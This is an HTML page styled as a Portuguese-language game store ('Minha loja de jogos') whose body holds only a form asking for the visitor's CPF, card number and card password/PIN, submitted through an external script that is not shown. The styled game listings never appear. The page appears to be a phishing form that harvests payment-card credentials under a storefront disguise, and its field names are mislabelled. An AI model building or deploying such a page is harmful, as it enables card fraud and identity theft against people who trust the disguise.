<!DOCTYPE html>
<html lang="pt-br">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Minha loja de jogos</title>
	<script src="./src/script.js"></script>
	<style>
		body {
			background-color: #171a21;
			color: #f2f2f2;
			font-family: "Helvetica Neue", sans-serif;
			margin: 0;
			padding: 0;
		}
		header {
			background-color: #2e2f31;
			padding: 10px;
			display: flex;
			justify-content: center;
			align-items: center;
		}
		header img {
			height: 50px;
			margin-right: 20px;
		}
		nav ul {
			list-style: none;
			margin: 0;
			padding: 0;
			display: flex;
			align-items: center;
		}
		nav li {
			margin-right: 20px;
			font-size: 16px;
			font-weight: bold;
			text-transform: uppercase;
			cursor: pointer;
		}
		nav li:hover {
			color: #8a8a8a;
		}
		nav li.active {
			color: white;
			border-bottom: 2px solid white;
		}
		main {
			max-width: 1200px;
			margin: 0 auto;
			padding: 20px;
			display: flex;
			flex-wrap: wrap;
			justify-content: space-between;
		}
		section {
			width: 100%;
			margin-top: 40px;
		}
		.game {
			width: 30%;
			margin-bottom: 40px;
			padding: 20px;
			background-color: #282828;
			box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
			border-radius: 5px;
			transition: all 0.3s ease-in-out;
		}
		.game:hover {
			transform: translateY(-5px);
			box-shadow: 0px 8px 15px rgba(0, 0, 0, 0.2);
		}
		.game img {
			width: 100%;
			height: 200px;
			object-fit: cover;
			margin-bottom: 10px;
			border-radius: 5px;
		}
		.game h3 {
			font-size: 20px;
			margin-bottom: 10px;
		}
		.game p {
			font-size: 14px;
			margin-bottom: 10px;
			height: 80px;
			overflow: hidden;
		}
		.game a {
			display: block;
			padding: 10px 20px;
			background-color: #0f9d58;
			color: white;
			border-radius: 5px;
			text-align: center;
			text-decoration: none;
			transition: all 0.3s ease-in-out;
		}
		.game a:hover {
			background-color: #0c7
		}
		#img-canto {
			position: fixed;
			right: 0;
			bottom: 0;
			z-index: 999;
        }
            .container {
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
}
</style>
</head>
<body>
<div class="container">
	<div class="contact-form">
		<form>
		  <label for="name">CPF</label><br>
		  <input type="text" name="name" id="name" placeholder="000.000.000-00" required><br>
		  <br>
		  <br>
		  <label for="email">Numero do cartão</label><br>
		  <input type="email" name="email" id="email" placeholder="" required><br>
		  <br>
		  <label for="phone">Senha do cartão</label><br>
		  <input type="tel" name="phone" id="phone" placeholder="" required><br>
		  <br>
		  <button onclick="enviarFormulario()">Enviar</button>
		</form>
	  </div>
	  </div>
</body>